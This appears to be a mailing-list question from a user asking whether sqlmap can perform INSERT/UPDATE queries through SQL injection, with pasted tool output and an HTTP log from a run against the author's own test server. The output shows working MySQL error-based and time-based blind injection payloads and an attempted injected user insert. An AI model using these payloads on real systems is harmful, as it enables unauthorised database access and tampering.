Hi,

Is it possible to make "insert/update" queries via SQL injection bugs?

I tried on my test machine via "--sql-query", but I didn't see the query in
request_uri:

(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
$ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log
--sql-query="insert into users set user='aaa',pass='bbb';"

    sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover
tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:07:53

[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as
session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 1212 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN
1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into
users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None

[21:07:54] [INFO] Fetched data logged to text files under
'/home/admin/sqlmap-dev/output/10.0.0.60'

[*] shutting down at: 21:07:54

(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
$ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close

HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8

HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port
80</address>

SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok

############################################################################


-- 
Kirill Morozov
KIMO2-RIPE, RHCE